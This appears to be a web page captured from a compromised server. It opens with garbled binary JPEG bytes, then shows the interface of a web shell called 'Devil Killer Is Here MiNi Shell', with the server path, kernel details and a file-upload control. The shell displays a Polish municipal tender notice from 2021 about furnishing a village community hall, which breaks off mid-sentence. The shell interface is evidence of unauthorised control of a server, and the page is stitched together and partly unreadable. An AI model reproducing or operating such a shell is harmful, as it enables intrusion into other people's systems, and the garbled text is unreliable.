JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210317/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210317/0001905302-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00019053 z dnia 2021-03-17</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i montaż wyposażenia świetlicy wiejskiej w Łychowie Gościeradowskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA TRZYDNIK DUŻY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409672</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Trzydnik Duży 59A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Trzydnik Duży</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">15 / 873 18 79</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@trzydnikduzy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.trzydnikduzy.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i montaż wyposażenia świetlicy wiejskiej w Łychowie Gościeradowskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-67ce8b82-86a4-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00019053</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00016936/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa i montaż wyposażenia w budynku świetlicy w Łychowie Gościeradowskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Utworzenie świetlicy wiejskiej poprzez rozbudowę i przebudowę budynku Ochotniczej Straży Pożarnej w Łychowie” współfinansowanego ze środków UE w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020, Poddziałanie: wsparcie inwestycji w tworzenie, ulepszenie i rozwijanie podstawowych usług lokalnych dla ludności wiejskiej, w tym rekreacji, kultury i powiązanej infrastruktury </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugtrzydnikduzy.bip.lubelskie.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elek­tronicznej przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ ePUAP https://epuap.gov.pl/wps/portal lub opcjonalnie za pośrednictwem poczty elektronicznej na e-mail: ugtrzydnik@ops.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. 2. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie mi niPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formula rzy do złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB.4. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający iWy konawcy posługują się numerem referencyjnym lub ID postępowania w systemie miniPortal. 5. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki.6. Za termin złożenia oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji przyjmuje się termin ich przekazania na ePUAP.7. Oferty, oświadczenia, o których mowa w pkt 12.6.3 SWZ podmiotowe środki dowodowe, w tym oświadczenie wykonawców składających ofertę wspólna, z którego wynika, któreroboty budowlane, dostawy lub usługi wykonują poszczególni wykonawcy, zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne z uwzględnieniem rodzaju przekazywanych danych. 8. Ofertę oraz oświadczenie o którym mowa w pkt 12.6.3. SWZ składa się, pod rygorem nie ważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 9. Informacje, oświadczenia lub dokumenty, inne niż określone w pkt 7, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej.10. W przypadku gdy dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nie uczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu utrzymania w po ufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.11. przypadku gdy podmiotowe środki dowodowe, przedmiotowe środki dowodowe, inne dokumenty, lub dokumenty potwierdzające umocowanie do reprezentowania, zostały wystawione przez upoważnione podmioty jako dokument w postaci papierowej, przekazuje sięcyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym,podpisem zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. 12. Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej opisane zostały w pkt 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1 Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. W sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobo­wych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informu­ję, że: 1.1 Administratorem Pani/Pana danych osobowych jest Wójt Gminy Trzydnik Duży. 1.2 Kontakt z Inspektorem Ochrony Danych – inspektor.rodo@trzydnikduzy.pl 1.3 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego. 1.4 Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp.1.5 Pani/Pana dane osobowe będą przechowywane na czas przewidziany przepisami prawa.1.6 Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana doty­czących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określo­nych danych wynikają z Pzp.2 W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.3 Posiada Pani/Pan:3.1 na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana doty­czących;3.2 na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;3.3 na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwa­rzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; 3.4 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących naru­sza przepisy RODO.4 Nie przysługuje Pani/Panu:4.1 w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobo­wych;4.2 prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;.4.3 na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobo­wych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GK.7013.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa i montaż wyposażenia elektronicznego. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SWZ oraz w załączniku nr 5 – wzorze umowy. 1. Dostarczony sprzęt/wyposażenie ma być zmontowany/ne i gotowy/e do użycia. Wykonawca ma obowiązek zapewnić protokołu uruchomienia i przeszkolenia użytkowników. 2. Zgodnie z art. 99 ust. 5 Pzp Zamawiający w niniejszym postępowaniu dopuszcza składanie ofert równoważnych, a wszelkie towary (materiały i urządzenia) określone w opisie przedmiotu zamówienia pochodzące od konkretnych producentów są określone minimalnymi parametrami technicznymi i użytko­wymi, jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiają­cego. Wykonawca może powołać się w ofercie na zastosowanie towarów (materiałów i urzą­dzeń) równoważnych opisywanych w specyfikacji warunków zamówienia, składając określo­ny Wykaz to­warów (materiałów i urządzeń) równoważnych wraz z dowodami – dokumenta­mi, o których mowa w pkt 3. W takim przypadku Wykonawca jest obowiązany wykazać, że oferowane przez niego towary (materiały i urządzenia), spełniają określone przez Zama­wiającego wymagania (kryteria równoważ­ności).3. Jeśli w opisie przedmiotu zamówienia zostało wskazane pochodzenie (marka, znak towa­rowy, producent, dostawca) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 99 ust. 5 Pzp, Zamawiający dopuszcza oferowanie ma­teriałów lub rozwiązań równoważnych pod warunkiem, że zagwarantują one prawidłową realizację dostaw oraz zapewnią uzyskanie parametrów technicznych nie gorszych od za­łożonych w wyżej wymienionych dokumentach, tj. w szczególności:3.1.Jeśli materiały lub urządzenia wskazane w szczegółowym opisie przedmiotu zamówienia pocho­dzą od konkretnych producentów oznacza to, że określają one minimalne pa­rametry jako­ściowe, cechy użytkowe jakim muszą odpowiadać materiały i urządzenia oferowane przez Wykonawcę. Wykonawca może zaoferować materiały i urządzenia, które spełniają co naj­mniej wszystkie minimalne parametry jakościowe, cechy użyt­kowe. Pod pojęciem „minimal­ne parametry jakościowe i cechy użytkowe” Zamawiają­cy rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie do­stępnych źródłach, katalogach, stronach in­ternetowych producentów.3.2.Jeśli materiały lub urządzenia wskazane w szczegółowym opisie przedmiotu zamówienia pocho­dzą od konkretnych producentów oznacza to, że stanowią one wyłącznie wzo­rzec jakościo­wy przedmiotu zamówienia. Wykonawca zawsze może zaoferować ma­teriały lub urządze­nia, które są jakościowo tożsame z opisanym materiałem lub urzą­dzeniem lub są jakościo­wo lepsze.3.3. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowa­nie po­ziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Po­sługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykłado­wy. Zamawiający, wska­zując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie pro­dukty równoważne o parametrach ja­kościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego pro­duktu, uznając tym samym każdy produkt o wskazanych lub lepszych parametrach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32320000-2 - Sprzęt telewizyjny i audiowizualny</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32330000-5 - Aparatura do nagrywania i powielania dźwięku i obrazu wideo</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryte­riów oce­ny ofert przyjmując zasadę, że 1% = 1 punkt. Wykonawca może otrzymać max 100 pkt.Kryteriami oceny ofert są:1 Oferowana cena – waga kryterium 60% = 60 pkt.2 Termin płatności – waga kryterium 40% = 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryte­riów oce­ny ofert przyjmując zasadę, że 1% = 1 punkt. Wykonawca może otrzymać max 100 pkt.Kryteriami oceny ofert są:1 Oferowana cena – waga kryterium 60% = 60 pkt.2 Termin płatności – waga kryterium 40% = 40 pkt. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa i montaż wyposażenia meblowego. Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SWZ oraz w załączniku nr 5 – wzorze umowy. 1. Dostarczony sprzęt/wyposażenie ma być zmontowany/ne i gotowy/e do użycia. Wykonawca ma obowiązek zapewnić protokołu uruchomienia i przeszkolenia użytkowników. 2. Zgodnie z art. 99 ust. 5 Pzp Zamawiający w niniejszym postępowaniu dopuszcza składanie ofert równoważnych, a wszelkie towary (materiały i urządzenia) określone w opisie przedmiotu zamówienia pochodzące od konkretnych producentów są określone minimalnymi parametrami technicznymi i użytko­wymi, jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiają­cego. Wykonawca może powołać się w ofercie na zastosowanie towarów (materiałów i urzą­dzeń) równoważnych opisywanych w specyfikacji warunków zamówienia, składając określo­ny Wykaz to­warów (materiałów i urządzeń) równoważnych wraz z dowodami – dokumenta­mi, o których mowa w pkt 3. W takim przypadku Wykonawca jest obowiązany wykazać, że oferowane przez niego towary (materiały i urządzenia), spełniają określone przez Zama­wiającego wymagania (kryteria równoważ­ności).3. Jeśli w opisie przedmiotu zamówienia zostało wskazane pochodzenie (marka, znak towa­rowy, producent, dostawca) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 99 ust. 5 Pzp, Zamawiający dopuszcza oferowanie ma­teriałów lub rozwiązań równoważnych pod warunkiem, że zagwarantują one prawidłową realizację dostaw oraz zapewnią uzyskanie parametrów technicznych nie gorszych od za­łożonych w wyżej wymienionych dokumentach, tj. w szczególności:3.1.Jeśli materiały lub urządzenia wskazane w szczegółowym opisie przedmiotu zamówienia pocho­dzą od konkretnych producentów oznacza to, że określają one minimalne pa­rametry jako­ściowe, cechy użytkowe jakim muszą odpowiadać materiały i urządzenia oferowane przez Wykonawcę. Wykonawca może zaoferować materiały i urządzenia, które spełniają co naj­mniej wszystkie minimalne parametry jakościowe, cechy użyt­kowe. Pod pojęciem „minimal­ne parametry jakościowe i cechy użytkowe” Zamawiają­cy rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie do­stępnych źródłach, katalogach, stronach in­ternetowych producentów.3.2.Jeśli materiały lub urządzenia wskazane w szczegółowym opisie przedmiotu zamówienia pocho­dzą od konkretnych producentów oznacza to, że stanowią one wyłącznie wzo­rzec jakościo­wy przedmiotu zamówienia. Wykonawca zawsze może zaoferować ma­teriały lub urządze­nia, które są jakościowo tożsame z opisanym materiałem lub urzą­dzeniem lub są jakościo­wo lepsze.3.3. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowa­nie po­ziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Po­sługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykłado­wy. Zamawiający, wska­zując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie pro­dukty równoważne o parametrach ja­kościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego pro­duktu, uznając tym samym każdy produkt o wskazanych lub lepszych parametrach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39100000-3 - Meble</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryte­riów oce­ny ofert przyjmując zasadę, że 1% = 1 punkt. Wykonawca może otrzymać max 100 pkt.Kryteriami oceny ofert są:1 Oferowana cena – waga kryterium 60% = 60 pkt.2 Termin płatności – waga kryterium 40% = 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryte­riów oce­ny ofert przyjmując zasadę, że 1% = 1 punkt. Wykonawca może otrzymać max 100 pkt.Kryteriami oceny ofert są:1 